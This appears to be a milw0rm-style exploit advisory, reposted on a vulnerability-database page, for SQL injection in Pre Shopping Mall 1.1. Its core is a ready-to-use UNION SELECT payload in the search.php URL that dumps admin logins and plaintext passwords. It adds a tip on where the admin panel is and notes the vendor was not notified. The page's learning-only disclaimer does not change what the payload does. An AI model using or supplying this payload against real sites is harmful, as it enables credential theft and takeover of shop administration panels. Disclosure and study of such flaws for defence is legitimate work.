--==+================================================================================+==-- --==+ Pre Shopping Mall 1.1 SQL Injection Vulnerablity +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovered On: Script Download: http://preproject.com DORK: N/A Vendor Has Not Been Notified! DESCRIPTION: Pre Shopping Mall suffers from multiple remote sql injection bugs. this allows the remote attacker to pull admin credentials from the database, since the admin details are in plaintext this makes it easy for the attacker to gain access to the administarion panel. SQL Injection: ADMIN: http://site.com/emall/search.php?search='/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,CONCAT(login,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/admin/* NOTE/TIP: admin login is at /admin/ injection is multi-row, so it will pull all rows from a table. GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+================================================================================+==-- --==+ Pre Shopping Mall 1.1 SQL Injection Vulnerablity +==-- --==+================================================================================+==--
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论